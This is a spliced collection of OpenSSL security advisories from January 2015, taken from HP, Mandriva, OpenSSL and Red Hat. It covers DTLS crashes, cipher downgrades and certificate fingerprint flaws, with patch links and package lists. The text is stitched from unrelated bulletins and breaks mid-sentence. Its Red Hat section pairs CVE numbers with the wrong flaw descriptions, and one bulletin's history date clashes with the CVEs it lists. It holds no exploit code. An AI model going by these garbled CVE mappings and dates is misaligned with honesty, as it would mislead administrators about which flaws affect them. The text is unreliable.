SSO Agent v8.0 and v8.0 2007 Update Release 2\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\n HP recommends the following software updates and workaround instructions to\nresolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and\nFederation Agent. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could\nbe using either the OS bundled OpenSSL library or the OpenSSL bundled with HP\nIceWall. If still using the OpenSSL bundled with HP IceWall, please switch to\nthe OpenSSL library bundled with the OS, and then follow the instructions in\nstep 3. \n\n Documents are available at the following location with instructions to\nswitch to the OS bundled OpenSSL library:\n\n http://www.hp.com/jp/icewall_patchaccess\n\n 2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,\nand SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please\ndownload the updated OpenSSL at the following location:\n\n http://www.hp.com/jp/icewall_patchaccess\n\n 3. For HP IceWall products running on RHEL and are using the OS bundled\nOpenSSL, RHEL has provided patch or mitigation instructions at the following\nlocation:\n\n https://access.redhat.com/articles/1369543\n\n Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch\nfor OpenSSL from the following location:\n\n https://access.redhat.com/security/cve/CVE-2014-8275\n\n 4. For IceWall products running on HP-UX which are using the OS bundled\nOpenSSL, please apply the HP-UX OpenSSL update from the following location:\n\n https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?produ\nctNumber=OPENSSL11I\n\nWORKAROUND INSTRUCTIONS\n\n HP recommends the following information to protect against potential risk\nfrom CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products. \n\n HP IceWall SSO Dfw and MCRP\n\n - If possible, do not use the SHOST setting which allows IceWall SSO\nDfw or MCRP to use SSL/TLS protocol to back-end web servers. \n\n - If possible, do not use EXPORT-grade ciphers on the back-end web\nservers. \n\n HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch\nrelease 2)\n\n - If possible, do not use the LDAPSSL setting which allows IceWall SSO\nCertd to connect to the LDAP server using SSL/TLS protocol. \n\n - If possible, do not use EXPORT-grade ciphers on the LDAP server. \n\n IceWall Federation Agent\n\n - If possible, use \"bindings:HTTP-POST\" instead of\n\"bindings:HTTP-Artifact\" setting in the service provider meta file. The\n\"bindings:HTTP-POST\" setting would disable IWFA to use SSL for communicating\nwith IdP server. \n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 19 March 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. \n \n The updated packages have been upgraded to the 1.0.0p version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n https://www.openssl.org/news/secadv_20150108.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm\n aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm\n fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm \n ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb\nLHbCdAkBpYHYSuaUwpiAu1w=\n=ePa9\n-----END PGP SIGNATURE-----\n. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. OpenSSL Security Advisory [08 Jan 2015]\n=======================================\n\nDTLS segmentation fault in dtls1_get_record (CVE-2014-3571)\n===========================================================\n\nSeverity: Moderate\n\nA carefully crafted DTLS message can cause a segmentation fault in OpenSSL due\nto a NULL pointer dereference. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of\nCisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL\ncore team. \n\nDTLS memory leak in dtls1_buffer_record (CVE-2015-0206)\n=======================================================\n\nSeverity: Moderate\n\nA memory leak can occur in the dtls1_buffer_record function under certain\nconditions. In particular this could occur if an attacker sent repeated DTLS\nrecords with the same sequence number but for the next epoch. The memory leak\ncould be exploited by an attacker in a Denial of Service attack through memory\nexhaustion. \n\nThis issue affects OpenSSL versions: 1.0.1 and 1.0.0. \n\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. \n\nThis issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also\nprovided an initial patch. Further analysis was performed by Matt Caswell of the\nOpenSSL development team, who also developed the final patch. \n\nno-ssl3 configuration sets method to NULL (CVE-2014-3569)\n=========================================================\n\nSeverity: Low\n\nWhen openssl is built with the no-ssl3 option and a SSL v3 ClientHello is\nreceived the ssl method would be set to NULL which could later result in\na NULL pointer dereference. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The\nfix was developed by Kurt Roeckx. \n\n\nECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)\n==========================================================\n\nSeverity: Low\n\nAn OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite\nusing an ECDSA certificate if the server key exchange message is omitted. This\neffectively removes forward secrecy from the ciphersuite. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nRSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)\n==============================================================\n\nSeverity: Low\n\nAn OpenSSL client will accept the use of an RSA temporary key in a non-export\nRSA key exchange ciphersuite. A server could present a weak temporary key\nand downgrade the security of the session. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nDH client certificates accepted without verification [Server] (CVE-2015-0205)\n=============================================================================\n\nSeverity: Low\n\nAn OpenSSL server will accept a DH certificate for client authentication\nwithout the certificate verify message. This effectively allows a client\nto authenticate without the use of a private key. This only affects servers\nwhich trust a client certificate authority which issues certificates\ncontaining DH keys: these are extremely rare and hardly ever encountered. \n\nThis issue affects OpenSSL versions: 1.0.1 and 1.0.0. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nCertificate fingerprints can be modified (CVE-2014-8275)\n========================================================\n\nSeverity: Low\n\nOpenSSL accepts several non-DER-variations of certificate signature\nalgorithm and signature encodings. OpenSSL also does not enforce a\nmatch between the signature algorithm between the signed and unsigned\nportions of the certificate. By modifying the contents of the\nsignature algorithm or the encoding of the signature, it is possible\nto change the certificate\u0027s fingerprint. \n\nThis does not allow an attacker to forge certificates, and does not\naffect certificate verification or OpenSSL servers/clients in any\nother way. It also does not affect common revocation mechanisms. Only\ncustom applications that rely on the uniqueness of the fingerprint\n(e.g. certificate blacklists) may be affected. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and\n0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nOne variant of this issue was discovered by Antti Karjalainen and\nTuomo Untinen from the Codenomicon CROSS program and reported to\nOpenSSL on 1st December 2014 by NCSC-FI Vulnerability\nCo-ordination. Another variant was independently reported to OpenSSL\non 12th December 2014 by Konrad Kraszewski from Google. Further\nanalysis was conducted and fixes were developed by Stephen Henson of\nthe OpenSSL core team. \n\nBignum squaring may produce incorrect results (CVE-2014-3570)\n=============================================================\n\nSeverity: Low\n\nBignum squaring (BN_sqr) may produce incorrect results on some\nplatforms, including x86_64. This bug occurs at random with a very\nlow probability, and is not known to be exploitable in any way, though\nits exact impact is difficult to determine. The following has been\ndetermined:\n\n*) The probability of BN_sqr producing an incorrect result at random\nis very low: 1/2^64 on the single affected 32-bit platform (MIPS) and\n1/2^128 on affected 64-bit platforms. \n*) On most platforms, RSA follows a different code path and RSA\noperations are not affected at all. For the remaining platforms\n(e.g. OpenSSL built without assembly support), pre-existing\ncountermeasures thwart bug attacks [1]. \n*) Static ECDH is theoretically affected: it is possible to construct\nelliptic curve points that would falsely appear to be on the given\ncurve. However, there is no known computationally feasible way to\nconstruct such points with low order, and so the security of static\nECDH private keys is believed to be unaffected. \n*) Other routines known to be theoretically affected are modular\nexponentiation, primality testing, DSA, RSA blinding, JPAKE and\nSRP. No exploits are known and straightforward bug attacks fail -\neither the attacker cannot control when the bug triggers, or no\nprivate key material is involved. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille\n(Blockstream) who also suggested an initial fix. Further analysis was\nconducted by the OpenSSL development team and Adam Langley of\nGoogle. The final fix was developed by Andy Polyakov of the OpenSSL\ncore team. \n\n[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf\n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150108.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:0066-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html\nIssue date: 2015-01-20\nUpdated on: 2015-01-21\nCVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 \n CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 \n CVE-2015-0206 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA NULL pointer dereference flaw was found in the DTLS implementation of\nOpenSSL. A remote attacker could send a specially crafted DTLS message,\nwhich would cause an OpenSSL server to crash. A remote attacker could send\nmultiple specially crafted DTLS messages to exhaust all available memory of\na DTLS server. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. (CVE-2014-3570)\n\nIt was discovered that OpenSSL would perform an ECDH key exchange with a\nnon-ephemeral key even when the ephemeral ECDH cipher suite was selected. \nAn attacker could use these flaws to modify an X.509 certificate to produce\na certificate with a different fingerprint without invalidating its\nsignature, and possibly bypass fingerprint-based blacklisting in\napplications. (CVE-2015-0205)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the above issues. For the update to\ntake effect, all services linked to the OpenSSL library (such as httpd and\nother SSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites\n1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix\n1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues\n1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record\n1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record\n1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 